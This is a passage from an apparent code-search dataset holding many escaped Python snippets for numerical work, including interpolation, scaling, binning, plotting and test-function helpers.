\"\n \"For example by using Lagrange interpolation for precise orbit, \"\n \"check if identical observation epochs are given in SP3 file\"\n )\n tot_mul *= (x_ip - x[j]) / float(x[i] - x[j])\n return tot_mul\n\n total += y[i] * g(i, n)\n return total\n\n return P", "def make_uniform_x(self, x_resolution, min_x = None, max_x = None, bin_above = 2.0, **kwargs):\n \n if min_x is None or max_x is None:\n a, b = self.get_min_max_x(**kwargs)\n if min_x is None:\n min_x = a\n if max_x is None:\n max_x = b\n \n new_x = numpy.arange(min_x, max_x + x_resolution / 2, x_resolution)\n \n for m in range(len(self.mess)):\n if m not in exclude and self.mess[m][\"class\"] not in exclude:\n resolution = (numpy.amax(m.x) - numpy.amin(m.x)) / len(m.x)", "def calculate(\n expression: str, symmetrical_bounds: Union[int, float] = 10\n ) -> Tuple[np.ndarray, np.ndarray]:\n symmetrical_bounds = abs(symmetrical_bounds)\n x = np.arange(-symmetrical_bounds, symmetrical_bounds, symmetrical_bounds / 50)\n expr = parse_expr(expression)\n x_symbol = Symbol(\"x\")\n\n y = np.array([expr.subs({x_symbol: x_point}).evalf() for x_point in x])\n\n return x, y", "def scale(x, a=5, b=10, xmin=-1, xmax=1):\n return (b - a)*(x - xmin)/(xmax - xmin) + a", "def projectionY(xdata, ydata, nbins, yrange=None, xrange=None):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(ymin, ymax, nbins+1)\n y_out = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(ydata, x_out[i], x_out[i+1]), xdata)\n y_out[i] = bin_data.size\n x_out += dx / 2.\n x_out = x_out[:-1]\n return x_out, y_out", "def create_grid(xlim, ylim, step):\n x_range = np.arange(xlim[0], xlim[1], step)\n y_range = np.arange(ylim[0], ylim[1], step)\n return x_range, y_range", "def calc(x_list):\n\n y_list = [x**2 + 2*x + 1 for x in x_list]\n\n return y_list", "def plot(self, a=None, b=None):\n\n # === choose reasonable interval if [a, b] not specified === #\n if a is None:\n a = self.observations.min() - self.observations.std()\n if b is None:\n b = self.observations.max() + self.observations.std()\n\n # === generate plot === #\n x_vals = np.linspace(a, b, num=100)\n f = np.vectorize(self.__call__)\n plt.plot(x_vals, f(x_vals))\n plt.show()", "def scale(x_range=1, y_range=1):\r\n x = rand_val(x_range)\r\n y = rand_val(y_range)\r\n return np.array(((x, 0, 0),\r\n (0, y, 0),\r\n (0, 0, 1)), dtype=np.float)", "def plot(self, center=0, xmin=-1, xmax=1):\n if self.eps == 0:\n return [xmin, center, center, xmax], [0, 0, 1, 1]\n else:\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, center-self.eps, 21),\n linspace(center-self.eps, center+self.eps, n+1),\n linspace(center+self.eps, xmax, 21))\n y = self(x)\n return x, y", "def project_weights_and_nodes(a, b, unit_weights, unit_nodes):\n\n\t# project onto interval [a,b]\n\tnodes = 0.5*(b-a)*unit_nodes + 0.5*(a+b)\n\tweights = 0.5*(b-a)*unit_weights\n\n\treturn weights, nodes", "def toPointwise_withLinearXYs( self, accuracy, biSectionMax = 16, **kwargs ) :\n\n if( accuracy < 1e-6 ) : accuracy = 1e-6\n if( accuracy > 0.1 ) : accuracy = 0.1\n\n P, n = [], 1000\n for i in xrange( n + 1 ) :\n x = ( ( n - i ) * self.domainMin + self.domainMax * i ) / n\n P.append( [ x, self.evaluate( x ) ] )\n axes = axesModule.axes( )\n yUnit = 
self.getAxisUnitSafely( 0 )\n xUnit = self.getAxisUnitSafely( 1 )\n axes[0] = axesModule.axis( 'y(x)', 0, yUnit )\n axes[1] = axesModule.axis( 'x', 1, xUnit )\n Pclass = self.toLinearXYsClass()\n P = Pclass( P, accuracy = accuracy, axes = axes )\n return( P.thin( accuracy = accuracy ) )", "def data_range(xs: List[float]) -> float:\n return max(xs) - min(xs)", "def getCellData(X, y, min0, max0, min1, max1):\n Xcell = []\n ycell = []\n\n for x,label in zip(X, y):\n if (x[0] >= min0) and (x[0] < max0) and (x[1] >= min1) and (x[1] < max1):\n Xcell.append(x)\n ycell.append(label)\n\n return np.array(Xcell), np.array(ycell)", "def makeCrossPlotX(f,g):\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(1,n1-1):\n x[i2][i1] = 0.5*(f[i2][i1+1]-f[i2][i1-1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y", "def __call__(self, x, y):\n xa = np.asarray(x)\n ya = np.asarray(y)\n return (self._evaluate(xa.flatten(), ya.flatten())).reshape(xa.shape)", "def get_densities(\n x: np.ndarray,\n y: np.ndarray,\n nx: int,\n ny: int,\n x_range: Tuple = (0, 100),\n y_range: Tuple = (0, 100),\n n: int = 30,\n) -> np.ndarray:\n\n x_values = np.linspace(x_range[0], x_range[1], nx)\n y_values = np.linspace(y_range[0], y_range[1], ny)\n\n density = np.empty((nx, ny))\n tree = get_kdtree(x, y)\n\n for x in tqdm(range(nx)):\n for y in range(ny):\n density[x, y] = get_density_from_neighbours(\n x_values[x], y_values[y], tree, n\n )\n\n return density, tree", "def coords_in_range(self, anchor, steps):\n coords = list()\n x_low = -steps\n x_high = steps\n\n #Generate using an axial formula to make it easier\n #calculate z via the other two and throw away ones that aren't in bounds\n for x in range(x_low, x_high+1):\n for y in range(max(-steps, -x-steps), min(steps, -x+steps)+1):\n z = -x - y\n coords.append(anchor+self.coord(x, y, z))\n return coords", "def alpha_range(x0, x1, x_min, x_max):\n if x0 == x1:\n raise ValueError('x1 and x2 should be different, get {} and {}'.format(x0, x1))\n alpha_x1 = (x_min - x0) / (x1 - x0)\n alpha_x2 = (x_max - x0) / (x1 - x0)\n alpha_min = max(0, min(alpha_x1, alpha_x2))\n alpha_max = min(1, max(alpha_x1, alpha_x2))\n return alpha_min, alpha_max", "def nll(x, a, b):\n x = _validate_x_bounds(x, low=0, high=1, strict_low=True, strict_high=True)\n return -mp.fsum([logpdf(t, a, b) for t in x])", "def lin_scale( val, x1, y1, x2, y2 ):\r\n x_range = (x2 - x1)\r\n new_val = 0\r\n if x_range is 0:\r\n new_val = y1\r\n else:\r\n y_range = ( y2 - y1 )\r\n new_val = ( ( ( val - x1 ) * y_range ) / x_range ) + y1\r\n\r\n return new_val", "def monte_carlo_integration(f, n, a, b, ret_arrays=False):\n x = np.random.uniform(0, 1, n)*(b-a)+a\n f_array = f(x)\n\n positive_x = x[f_array >= 0]\n negative_x = x[f_array < 0]\n if positive_x.size > 0:\n h = np.max(f_array)\n else:\n h = np.max(-f_array)\n \n y_positive = np.random.uniform(0, 1, positive_x.size)*h\n y_negative = np.random.uniform(0, 1, negative_x.size)*h\n \n xy_indices_below = y_positive <= f(positive_x)\n xy_indices_above = y_negative <= -f(negative_x)\n n_inside_below = y_positive[xy_indices_below]\n n_inside_above = -y_negative[xy_indices_above]\n \n if ret_arrays:\n n_inside_x = np.append(positive_x[xy_indices_below],negative_x[xy_indices_above])\n n_inside_y = np.append(n_inside_below, n_inside_above)\n return n_inside_x, n_inside_y\n \n return h*(b-a)*(n_inside_below.size-n_inside_above.size)/(n)", "def bws(x, y, 
**kwargs):\n\tx.sort()\n\ty.sort()\n\tnpx = np.array(x)\n\tnpy = np.array(y)\n\n\txs = np.unique(npx)\n\tys = np.unique(npy)\n\txys = set(xs).union(set(ys))\n\taxy = np.array(list(xys))\n\taxy.sort()\n\n\tG = np.array([len(axy[np.where(axy <= xi)]) for xi in xs])\n\tH = np.array([len(axy[np.where(axy <= yi)]) for yi in ys])\n\n\tn = len(G)\n\tm = len(H)\n\tfn = float(n)\n\tfm = float(m)\n\n\tN = np.linspace(1,n,num=n)\n\tM = np.linspace(1,m,num=m)\n\n\txt1 = np.power(G - N*(fm + fn)/fn, 2.0)\n\txtt = N/(fn+1.0)\n\txt2 = xtt*(1 - xtt)*(fm * (fm+fn)/fn)\n\tBx = np.sum(xt1/xt2)/fn\n\t\n\tyt1 = np.power(H - M*(fm + fn)/fm, 2.0)\n\tytt = M/(fm+1.0)\n\tyt2 = ytt*(1 - ytt)*(fn * (fm+fn)/fm)\n\tBy = np.sum(yt1/yt2)/fm\n\n\tB = (Bx+By)/2.0\n\n\tprint \"B = \", B\n\t\n\tJ = 3\n\tif \"j\" in kwargs:\n\t\tJ = kwargs[\"j\"]\n\t\n\treturn compute_xi(B, J)", "def getx(v, lb, ub, i, B):\r\n x = lb + np.multiply((ub - lb), v)\r\n x[i] = B - (x.sum() - x[i])\r\n # Test if variable x[i] is within the bounds\r\n if x[i] <= ub[i] and x[i] >= lb[i]:\r\n return x\r\n else:\r\n return np.array([])", "def generate_points(r_squared, min_val=5, max_val=100):\n r = sqrt(r_squared)\n x_list = []\n lb_list = []\n ub_list = []\n for i in range(min_val, max_val):\n x_list.append(i)\n lb, ub = pearson_confidence(r, i)\n lb_list.append(lb)\n ub_list.append(ub)\n return np.array(x_list), np.array(lb_list) ** 2, np.array(ub_list) ** 2", "def axis_range ( xmin , xmax , delta = 0.05 , log = False ) :\n xmn = min ( xmin , xmax )\n xmx = max ( xmin , xmax )\n \n import math\n \n ## 1) special case\n if isequal ( xmn , xmx ) :\n return math.floor ( xmn - 0.1 ) , math.ceil ( xmx + 0.1 ) \n\n ## 2) special case\n if islong ( xmn - 0.5 ) and islong ( xmn + 0.5 ) :\n return math.floor ( xmn - 0.1 ) , math.ceil ( xmx + 0.1 ) \n\n d = xmx - xmn\n \n if 0 <= xmn < xmx :\n \n xmin = max ( 0 , xmn - delta * d )\n xmax = xmx + delta * d \n \n elif xmn < xmx <= 0 :\n \n xmin = xmn - delta * d \n xmax = max ( 0 , xmx + delta * d )\n \n elif xmn < 0 < xmx :\n \n xmin = ( 1 + delta ) * xmn \n xmax = ( 1 + delta ) * xmx\n \n else : \n \n xmin = xmn - delta * d \n xmax = xmx + delta * d \n\n N = 3\n \n a1 , b1 = frexp10 ( xmin )\n a2 , b2 = frexp10 ( xmax )\n\n b1 -= N \n b2 -= N \n \n xmin = math.floor ( a1 * ( 10**N ) ) * ( 10 ** b1 )\n xmax = math.ceil ( a2 * ( 10**N ) ) * ( 10 ** b2 )\n \n return xmin , xmax", "def ni_range(x0, x1, dx=1):\n # sanity check arguments\n if dx==0:\n raise ValueError(\"invalid parameters: dx==0\")\n if x0>x1 and dx>=0:\n raise ValueError(\"invalid parameters: x0>x1 and dx>=0\")\n if x0<x1 and dx<=0:\n raise ValueError(\"invalid parameters: x0<x1 and dx<=0\")\n \n # generate range list\n range_list = []\n x = x0\n while x < x1:\n range_list.append(x)\n x += dx\n return range_list", "def sampler(xaxis, yaxis, vals, x, y):\n i = 0\n while xaxis[i] < x:\n i += 1\n j = 0\n while yaxis[j] < y:\n j += 1\n return vals[i, j]", "def felix_binning(xs, ys, delta=1):\n \n #bins = np.arange(start, end, delta)\n #occurance = np.zeros(start, end, delta)\n BIN_STEP = delta\n BIN_START = xs.min()\n BIN_STOP = xs.max()\n\n indices = xs.argsort()\n datax = xs[indices]\n datay = ys[indices]\n\n print(\"In total we have: \", len(datax), ' data points.')\n #do the binning of the data\n bins = np.arange(BIN_START, BIN_STOP, BIN_STEP)\n print(\"Binning starts: \", BIN_START, ' with step: ', BIN_STEP, ' ENDS: ', BIN_STOP)\n\n bin_i = np.digitize(datax, bins)\n bin_a = np.zeros(len(bins)+1)\n bin_occ = np.zeros(len(bins)+1)\n\n for i in 
range(datay.size):\n bin_a[bin_i[i]] += datay[i]\n bin_occ[bin_i[i]] += 1\n\n binsx, data_binned = [], []\n for i in range(bin_occ.size-1):\n if bin_occ[i] > 0:\n binsx.append(bins[i]-BIN_STEP/2)\n data_binned.append(bin_a[i]/bin_occ[i])\n\n #non_zero_i = bin_occ > 0\n #binsx = bins[non_zero_i] - BIN_STEP/2\n #data_binned = bin_a[non_zero_i]/bin_occ[non_zero_i]\n\n return binsx, data_binned", "def domain_range(domain, _range=[0, 1], return_transform=False):\n\n if not return_transform:\n return interp1d([min(domain), max(domain)], [min(_range), max(_range)], bounds_error=False)\n else:\n m = interp1d([min(domain), max(domain)], [min(_range), max(_range)])\n return [float(m(v)) for v in domain] # Take float, else returns weird numpy.ndarray element", "def yield_spectral_range(self) -> Tuple[float, float, float]:\n return [min(self.x), max(self.x), len(self.x)]", "def norm_funct(x,min_x,max_x,a=-1,b=1):\n return (b-a)*((x-min_x)/(max_x - min_x)) + a", "def scale_range(x, input_range, target_range):\n\n range = [np.amin(x), np.amax(x)]\n x_std = (x - input_range[0]) / (1.0*(input_range[1] - input_range[0]))\n x_scaled = x_std * (1.0*(target_range[1] - target_range[0])) + target_range[0]\n return x_scaled, range", "def interval_prob(x1, x2, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x1 = mp.mpf(x1)\n x2 = mp.mpf(x2)\n if x1 > x2:\n raise ValueError('x1 must not be greater than x2')\n return mp.betainc(a, b, x1, x2, regularized=True)", "def normalize_wrt_x(self):\n\n x_min = min(self.x)\n x_max = max(self.x)\n y_min = min(self.y)\n\n x_range = x_max - x_min\n\n x = np.array(self.x)\n y = np.array(self.y)\n x -= x_min\n y -= y_min\n x = x / float(x_range)\n y = y / float(x_range)\n\n self.x = x.tolist()\n self.y = y.tolist()", "def x_mesh(N,interval):\n (a,b) = interval\n h = (b-a)/N\n xmesh1=[a]\n for i in range(1,N):\n xmesh1.append(a+i*h)\n xmesh1.append(b)\n xmesh2=xmesh1[1:N]\n \n return xmesh1,xmesh2", "def xi(a):\n return xrange(len(a))", "def get_xrange_indices(self, lower, upper) -> Tuple[int, int]:\n lower_index = np.argmax(self.x >= lower)\n upper_index = np.argmax(self.x >= upper)\n return int(lower_index), int(upper_index)", "def plot(self, center=0, xmin=-1, xmax=1):\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, center-self.eps, 21),\n linspace(center-self.eps, center+self.eps, n+1),\n linspace(center+self.eps, xmax, 21))\n y = self(x)\n return x, y", "def in_range(x, a, b):\n return (x >= a and x <= b) or (x <= a and x >= b)", "def external2internal(xe,bounds):\n\n xi = np.empty_like(xe)\n\n for i,(v,bound) in enumerate(zip(xe,bounds)):\n \n a = bound[0] # minimum\n b = bound[1] # maximum\n\n if a == None and b == None: # No constraints\n xi[i] = v\n\n elif b == None: # only min\n xi[i] = np.sqrt( (v-a+1.)**2.-1 )\n\n elif a == None: # only max\n xi[i] = np.sqrt( (b-v+1.)**2.-1 )\n\n else: # both min and max\n xi[i] = np.arcsin( (2.*(v-a)/(b-a))-1.)\n\n return xi", "def calcBRange(c,n=10):\n \n bMin = -abs(c)/2.0 \n bMax = abs(c)/2.0 \n return np.linspace(bMin,bMax,n)", "def simulate_x_values(self, minimum = -10, maximum = 10, length = 100):\n return np.sort(np.random.uniform(minimum, maximum, length) )", "def execute():\n # Create a list of evenly-spaced numbers over the range\n x_axis = np.linspace(0, 20, 100)\n plt.plot(x_axis, np.sin(x_axis)) # Plot the sine of each x point\n plt.show()", "def query_range(tree, start_y, start_x, end_y, end_x):\n res = 0\n start_y -= 1\n\n while end_y > start_y:\n res += bit.query_range(tree[end_y], start_x, end_x)\n 
end_y -= (end_y & -end_y)\n\n while start_y > end_y:\n res -= bit.query_range(tree[start_y], start_x, end_x)\n start_y -= (start_y & -start_y)\n\n return res", "def partition(X: np.ndarray, y: np.ndarray, num_partitions: int) -> XYList: # returns list of Xy (read more about function annotations) ????\n return list(\n zip(np.array_split(X, num_partitions), \n np.array_split(y, num_partitions))\n )", "def eulers_method(f, y, dx, range):\n x = min(range)\n y_space = [y]\n x_space = [x]\n while x<=max(range):\n y += f(x, y)*dx\n x += dx\n x_space.append(x)\n y_space.append(y)\n return (x_space, y_space)", "def drange(x, y, jump):\n while x < y:\n yield float(x)\n x += decimal.Decimal(jump)", "def getScaleValues(a, x):\n raise NotImplementedError('getScaleValues not implemented')", "def range14(self, nx, ny, x_des):\n [c_d, a1, output] = [self.component_dependency['y_14'], self.dependency_matrix, []]\n for i in range(ny):\n [sum_i, row] = [[], a1[3 * ny + i]]\n sum_i.append(np.sum(row))\n [assign, y] = [c_d[i], []]\n # :x_des = np.random.random_sample(4 * nx + 5 * ny) # this is an instance of the design vector\n [y.append(self.per_int.range_int([x_des[k]])) for k in range(4 * nx + 5 * ny) if row[k] == 1]\n output.append(np.sum(y) * 1 / sum_i)\n print (c_d)\n\n return output", "def split(self, X: tp.ArrayLike, n: tp.Optional[int] = None, range_len: tp.Optional[float] = None,\n min_len: int = 1, start_idxs: tp.Optional[tp.ArrayLike] = None,\n end_idxs: tp.Optional[tp.ArrayLike] = None, **kwargs) -> RangesT:\n X = to_any_array(X)\n if isinstance(X, (pd.Series, pd.DataFrame)):\n index = X.index\n else:\n index = pd.Index(np.arange(X.shape[0]))\n\n # Resolve start_idxs and end_idxs\n if start_idxs is None and end_idxs is None:\n if range_len is None and n is None:\n raise ValueError(\"At least n, range_len, or start_idxs and end_idxs must be set\")\n if range_len is None:\n range_len = len(index) // n\n if 0 < range_len < 1:\n range_len = math.floor(range_len * len(index))\n start_idxs = np.arange(len(index) - range_len + 1)\n end_idxs = np.arange(range_len - 1, len(index))\n elif start_idxs is None or end_idxs is None:\n raise ValueError(\"Both start_idxs and end_idxs must be set\")\n else:\n if isinstance(start_idxs, pd.Index):\n start_idxs = np.asarray([find_first_occurrence(idx, index) for idx in start_idxs])\n else:\n start_idxs = np.asarray(start_idxs)\n if isinstance(end_idxs, pd.Index):\n end_idxs = np.asarray([find_first_occurrence(idx, index) for idx in end_idxs])\n else:\n end_idxs = np.asarray(end_idxs)\n\n # Filter out short ranges\n start_idxs, end_idxs = np.broadcast_arrays(start_idxs, end_idxs)\n range_lens = end_idxs - start_idxs + 1\n min_len_mask = range_lens >= min_len\n if not np.any(min_len_mask):\n raise ValueError(f\"There are no ranges that meet range_len>={min_len}\")\n start_idxs = start_idxs[min_len_mask]\n end_idxs = end_idxs[min_len_mask]\n\n # Evenly select n ranges\n if n is not None:\n if n > len(start_idxs):\n raise ValueError(f\"n cannot be bigger than the maximum number of ranges {len(start_idxs)}\")\n idxs = np.round(np.linspace(0, len(start_idxs) - 1, n)).astype(int)\n start_idxs = start_idxs[idxs]\n end_idxs = end_idxs[idxs]\n\n return split_ranges_into_sets(start_idxs, end_idxs, **kwargs)", "def ticks(self, start, end, desired_ticks=8):\n if start == end or isnan(start) or isnan(end):\n return [start]\n min, max, delta = heckbert_interval(start, end, desired_ticks, enclose=True)\n return frange(min, max, delta)", "def test_linear_interpolation_range(self):\n\n 
for x in [[1.0, 2.0, 4.0], [-20, -19, 0], numpy.arange(200) + 1000]:\n for y in [[5.0, 9.0], [100, 200, 10000]]:\n\n # Define ny by nx array with corresponding values\n A = numpy.zeros((len(x), len(y)))\n\n # Define values for each x, y pair as a linear function\n for i in range(len(x)):\n for j in range(len(y)):\n A[i, j] = linear_function(x[i], y[j])\n\n # Test that linearly interpolated points are correct\n xis = numpy.linspace(x[0], x[-1], 100)\n etas = numpy.linspace(y[0], y[-1], 100)\n points = combine_coordinates(xis, etas)\n\n vals = interpolate2d(x, y, A, points, mode='linear')\n refs = linear_function(points[:, 0], points[:, 1])\n assert numpy.allclose(vals, refs, rtol=1e-12, atol=1e-12)", "def g_rosenbrock(x, a=1, b=100):\n\n g = np.array(\n [\n -2 * a - 4 * b * x[0] * (-x[0] ** 2 + x[1]) + 2 * x[0],\n b * (-2 * x[0] ** 2 + 2 * x[1]),\n ]\n )\n\n return g", "def range34(self, nx, ny, x_des):\n [c_d, a1, output] = [self.component_dependency['y_34'], self.dependency_matrix, []]\n for i in range(ny):\n [sum_i, row] = [[], a1[11 * ny + 2 * nx + i]]\n sum_i.append(np.sum(row))\n [assign, y] = [c_d[i], []]\n # :x_des = np.random.random_sample(4 * nx + 5 * ny) # this is an instance of the design vector\n [y.append(self.per_int.range_int([x_des[k]])) for k in range(4 * nx + 5 * ny) if row[k] == 1]\n output.append(np.sum(y) * 1 / sum_i)\n\n return output", "def _lagrange(x, y):\n x_col, x_row = np.meshgrid(x, x)\n diff_x = x_col - x_row + np.eye(len(x))\n n = len(x)\n indices = np.eye(n) == 0\n\n def P(x_ip):\n l = np.zeros((n, x_ip.shape[0]))\n for idx, idxs in enumerate(indices):\n l[idx] = np.prod((x_ip[:, None] - x[idxs]) / diff_x[idxs, idx], axis=1)\n\n return np.sum(y * l.T, axis=1)\n\n return P", "def bapply(x,y,bins,func):\n \n assert bins[0] <= min(x),'range'\n assert bins[-1] > max(x),'range'\n\n bid = np.digitize(x,bins) \n nbins = bins.size-1\n yapply = np.zeros(nbins)\n\n for id in range(1,nbins):\n yb = y[bid==id]\n yapply[id-1] = func(yb)\n\n return yapply", "def ticks(self, start, end, desired_ticks=8):\n if start == end or isnan(start) or isnan(end):\n return [start]\n min, max, delta = heckbert_interval(start, end, desired_ticks,\n nicefunc=self._nice_pow10,\n enclose = True)\n return frange(min, max, delta)", "def generate_random_scatter(x_range, w, b, k):\n\tx_1 = []\n\ty_1 = []\n\tx_2 = []\n\ty_2 = []\n\tfor i in range(k):\n\t\txx = random.random() * (x_range[1] - x_range[0]) + x_range[0]\n\t\tx_1.append(xx)\n\t\tamplitude = random.randint(4, 15)\n\t\tyy = w * xx + b + amplitude\n\t\ty_1.append(yy)\n\n\t\txx = random.random() * (x_range[1] - x_range[0]) + x_range[0]\n\t\tx_2.append(xx)\n\t\tamplitude = random.randint(4, 15)\n\t\tyy = w * xx + b - amplitude\n\t\ty_2.append(yy)\n\treturn x_1, y_1, x_2, y_2", "def inrange ( a , x , b ) :\n _a = float(a)\n _b = float(b)\n _x = float(x)\n return ( _a <= _x or isequal ( _a , _x ) ) and ( _x <= _b or isequal ( _x , _b ) )", "def Calc(self, a, b, size):\n self.eq = lambda x: (60000/((b-a)/size*x+a))\n points = []\n names = [str(self.offset)]\n points.append(0)\n for j in range(1, int(size)):\n points.append(integrate.quad(self.eq,0,j)[0])\n names.append(str(points[-1]+self.offset))\n self.beatstr = ' '.join(names)\n return points", "def get_xrange(self) -> np.array:\n # todo: ensure this functions work as well for y_values\n lower, upper = self.get_xrange_indices()\n return self.x[lower, upper + 1]", "def startEndPoints(start, end, num):\n ll = np.linspace(0,1,num)\n xxs = start[0]*(1-ll)+end[0]*ll\n tts = 
start[1]*(1-ll)+end[1]*ll\n return( np.array([xxs, tts]) )", "def g_batched_rosenbrock(\n x: np.ndarray, num_batches: int, a: np.ndarray, b: np.ndarray\n) -> np.ndarray:\n gall = np.zeros(2 * num_batches)\n for i in range(num_batches):\n gall[i * 2 : (i + 1) * 2] = g_rosenbrock(\n x[i * 2 : (i + 1) * 2], a[i], b[i]\n )\n\n return gall", "def profileY(xdata, ydata, nbins, yrange=None, xrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(ymin, ymax, nbins+1)\n y_out = np.empty(nbins)\n y_err = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(ydata, x_out[i], x_out[i+1]), xdata)\n y_out[i] = np.mean(bin_data)\n y_err[i] = np.std(bin_data) / bin_data.size**0.5\n x_out += dx / 2.\n x_out = x_out[:-1]\n if drop_nan:\n selection = ~(np.isnan(y_out) | np.isnan(y_err))\n x_out = x_out[selection]\n y_out = y_out[selection]\n y_err = y_err[selection]\n return x_out, y_out, y_err", "def plot(self, aVals, bVals):\n with self.pt as sp:\n # Top subplot: The range of interest\n X = np.linspace(self.xMin, self.xMax, self.N)\n self.subplot(sp, X, aVals, bVals)\n # Bottom subplot: Positive X surrounding the range of\n # interest\n X = np.linspace(0, 2*self.xMax, self.N)\n sp.add_axvline(self.xMin)\n sp.add_axvline(self.xMax)\n self.subplot(sp, X, aVals, bVals, semilog=True)\n self.pt.show()", "def get_x_in_range(self, start, target_func, max_distance, sort_func=None):\n if sort_func is None:\n targets = []\n for x in range(-max_distance, max_distance + 1):\n for y in range(-max_distance, max_distance + 1):\n distance = abs(x) + abs(y)\n if distance > max_distance:\n continue\n pos = Position(start.x + x, start.y + y)\n if target_func(pos, distance):\n targets.append(pos)\n return targets\n else:\n targets = PriorityQueue()\n for x in range(-max_distance, max_distance + 1):\n for y in range(-max_distance, max_distance + 1):\n distance = abs(x) + abs(y)\n if distance > max_distance:\n continue\n pos = Position(start.x + x, start.y + y)\n if target_func(pos, distance):\n targets.enqueue(sort_func(pos, distance), pos)\n return targets.to_list()", "def from_inclusive(a, b):\n c = int(b > a)*2-1\n return range(a, b+c, c)", "def get_xrange(self):\n return self.xvec[0], self.xvec[-1]", "def function_to_XYs(func, fpars,\n Egrid=equal_bins(100),\n domainUnit='eV', domainName='energy_in', rangeUnit='b', rangeName='crossSection',\n accuracy=upperEps):\n return XYs1dModule.XYs1d.createFromFunction(\n XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: (rangeName, rangeUnit),\n XYs1dModule.xAxisIndex: (domainName, domainUnit)}),\n Xs=Egrid,\n func=func,\n parameters=fpars,\n accuracy=accuracy,\n biSectionMax=20,\n checkForRoots=False,\n infill=1,\n safeDivide=1)", "def val_split(a: Iterable, partitions: int, range_max: int, range_min: int = 0,\n size: bool = True) -> List[np.ndarray]:\n if size:\n n = int(np.ceil(range_max / partitions))\n splits = partitions\n else:\n n = partitions\n splits = (range_max - range_min) // partitions\n\n it = iter(a)\n it_current = next(it)\n ret_val = [[] for _ in range(n)]\n\n try:\n if isinstance(it_current, (tuple, list, np.ndarray)):\n it_current, it_value = it_current\n for i in range(n):\n for j in range(splits):\n split_current = (partitions + 1) * i + 
j\n while it_current <= split_current:\n ret_val[i].append([it_current, it_value])\n it_current, it_value = next(it)\n continue\n return list(map(np.array, ret_val))\n for i in range(n):\n for j in range(splits):\n split_current = (partitions + 1) * i + j\n while it_current <= split_current:\n ret_val[i].append(it_current)\n it_current = next(it)\n continue\n except StopIteration:\n return list(map(np.array, ret_val))", "def _ScatterXUniformlyExtendedRange(self, num_points, lattice_sizes,\n input_dims):\n x = []\n for _ in range(num_points):\n point = [\n np.random.random() * (lattice_sizes + 1.0) - 1.0\n for _ in range(input_dims)\n ]\n x.append(np.asarray(point))\n if input_dims == 1:\n x.sort()\n return x", "def pmm(a, *b):\n ind = np.isfinite(a)\n try:\n ans = [[ np.min(a[ind]), np.max(a[ind]) ]]\n except TypeError:\n a_tmp = np.asarray(a)\n ans = [[ np.min(a_tmp[ind]), np.max(a_tmp[ind]) ]]\n for val in b:\n ind = np.isfinite(val)\n try:\n ans.append( [np.min(val[ind]), np.max(val[ind])] )\n except TypeError:\n val_tmp = np.asarray(val)\n ans.append( [np.min(val_tmp[ind]), np.max(val_tmp[ind])] )\n return ans", "def plot(self, xmin=-1, xmax=1):\n if xmin > self.L or xmax < self.R:\n raise ValueError('xmin=%g > L=%g or xmax=%g < R=%g is meaningless for plot' % (xmin, self.L, xmax, self.R))\n\n if self.eps == 0:\n return [xmin, L, L, R, R, xmax], [0, 0, 1, 1, 0, 0]\n else:\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, self.L-self.eps, 21),\n linspace(self.L-self.eps, self.R+self.eps, n+1),\n linspace(self.R+self.eps, xmax, 21))\n y = self(x)\n return x, y", "def domain(self):\n lower, upper = sorted((self.x1, self.x2))\n return FloatRange(lower=lower, upper=upper)", "def toPointwise_withLinearXYs( self, **kwargs ) :\n\n return( XYs1d( data = [ [ self.domainMin, self.value ], [ self.domainMax, self.value ] ], axes = self.axes ) )", "def XbarTXbar(d, A=None, B=None):\n n = len(d) + 1\n if A is None: A = np.arange(n-1)\n if B is None: B = np.arange(n-1)\n V = np.empty((len(A), len(B)))\n for i, j in itt.product(range(len(A)), range(len(B))):\n a, b = A[i], B[j]\n u, v = _minmax(a, b)\n V[i, j] = d[a] * d[b] * (u * (n - v)) / n\n return V", "def sum_range(self, lower, upper):\n if upper>self.upper:\n upper=self.upper\n if lower<self.lower:\n lower = self.lower\n\n i_l = int(np.floor((lower-self.lower)/self._dx))\n i_u = int(np.floor((upper-self.lower)/self._dx))\n total = 0.0\n for i in range(i_l,i_u):\n total+= self.y[i]\n return total", "def get_range(min, max, intervals, log):\n if not log:\n min = float(min)\n max = float(max)\n difference = max-min\n step_size = difference/intervals\n output = [min + i*step_size for i in range(intervals+1)]\n return output\n else:\n from math import log10 as log\n log_min = log(min)\n log_max = log(max)\n log_difference = log_max - log_min\n step_size = log_difference/intervals\n output = [pow(10, log_min + i*step_size) for i in range(intervals+1)]\n return output", "def _grid_from_X(X, percentiles, grid_resolution, custom_range):\n values = []\n for feature in X.columns:\n if feature in custom_range:\n # Use values in the custom range\n feature_range = custom_range[feature]\n if not isinstance(feature_range, (np.ndarray, pd.Series)):\n feature_range = np.array(feature_range)\n if feature_range.ndim != 1:\n raise ValueError(\n \"Grid for feature {} is not a one-dimensional array. 
